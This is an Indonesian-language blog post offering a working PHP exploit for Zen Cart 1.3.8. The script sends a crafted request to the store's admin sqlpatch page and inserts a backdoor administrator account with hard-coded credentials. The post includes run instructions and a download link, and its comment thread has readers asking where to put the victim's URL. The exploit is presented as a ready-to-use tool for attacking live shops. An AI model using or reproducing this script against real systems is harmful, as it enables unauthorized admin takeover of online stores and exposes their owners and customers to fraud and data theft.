29 June 2010

Zen Cart SQL Execution Exploit php

Lama nggak update blog...
ahkir ahkir ini banyak anak anak yang cari cari target zencart.
iseng aku coba rubah zen.py yang berbasis phyton di milw0rm ke php.

jalan kan scripts php dibawah ini kalau hasilnya done
coba login adminya dengan

username : adminsys
password : wew


ini scriptsnya:
http://noscan.xp3.biz/zen.txt

#!/usr/bin/php

if($argc < 2)
{
echo "
==============================================
Zen Cart 1.3.8 Remote SQL Execution Exploit
==============================================


root@irvian ~# php zen.php http://target.com
==============================================
";exit(1);
}

function gets($url,$post=null) {
$hajar = curl_init();
curl_setopt($hajar,CURLOPT_URL, $url);
curl_setopt($hajar, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($hajar, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($hajar, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

curl_setopt ($hajar, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($hajar, CURLOPT_TIMEOUT, 0);

if($post != null)
{
curl_setopt ($hajar, CURLOPT_POST, true);
curl_setopt ($hajar, CURLOPT_POSTFIELDS,$post);
}

$result = curl_exec($hajar);
curl_close($hajar);
return $result;
}

$url = $argv[1];

$sql = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56, 'adminsys', 'admin@irvian.info', '617ec22fbb8f201c366e9848c0eb6925:87');
";
$enc = urlencode($sql);
$form = $url."/admin/sqlpatch.php/password_forgotten.php?action=execute";

$req = gets($form,"query_string=$enc");

if(preg_match("/1 statements processed/i", $req)){
echo "\n[!]Done";
}
else{
echo "\n[!]failed";}



9 komentar:

letjen said...

hmmm bash plz master irvian

[v] said...

gini dong aktif lagi, ojok cuma stres goro² england dibantai cah cilik² :))

fekkeh said...

mwah ....

rajakoya said...

pelit e gak gelem awehi...

rajakoya said...

binggung carane aku... iso luwih rinci gak kui??

Anonymous said...

hehehe..
kek nya itu kurang ya script nya om..
kurang

irvian said...

tool sudah di uji coba dengan baik, sudah dijelaskan di atas bahwa ini tool php jadi jgn lupa menambahkan karakter php pada awal dah ahkir.
http://noscan.xp3.biz/zen.txt

kacung said...

masukin url korban nya dimana mas ?

rajakoya said...

kok php no found terus napa yaa???

powered by irvian